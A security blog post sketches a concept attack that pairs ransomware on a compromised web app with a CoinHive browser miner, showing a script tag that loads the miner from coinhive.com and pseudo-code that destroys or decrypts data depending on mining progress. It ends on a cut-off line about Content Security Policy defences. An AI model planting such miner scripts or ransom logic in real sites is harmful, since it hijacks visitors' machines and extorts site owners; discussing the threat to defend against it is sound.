A few months back in a previous post we gave a POC for malware embedded in an enterprise Spring MVC app. Then we got to thinking, what if we pwn3d a web app with malicious code and turned the result into a self-paying crypto-currency miner? You could give the owner of the site the option to either pay the ransom or just let the mining operation complete, at which point their files get decrypted, and their life goes back to normal.
Our crypto miner web app extends the previous concept. So, let's first review:
This concept takes the previous iteration and adds a miner to the operation so we can make some crypto-cash while we wait for the ransom to be delivered.
This way the miner starts as soon as the ransomware note page is loaded.
<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.Anonymous('YOUR_SITE_KEY'); miner.start(); </script>
while(miner.getHashesPerSecond() > 0) // show ransom note to allow decryption // else destroy data
We can also make things more interesting by letting the user either pay the ransom and unlock the data immediately or allow the crypto miner run until the amount required by the ransomware is mined, then decrypt the data.
while (miner.getAcceptedHashes() < SOME_VAL) // keep mining // else decrypt data since we already made our money
It seems like a new ransomware called Storagecrypt may already doing a variation of this attack. Of course, site owners with good security, especially those with good Content Security Policies can avoid this kind of attack by: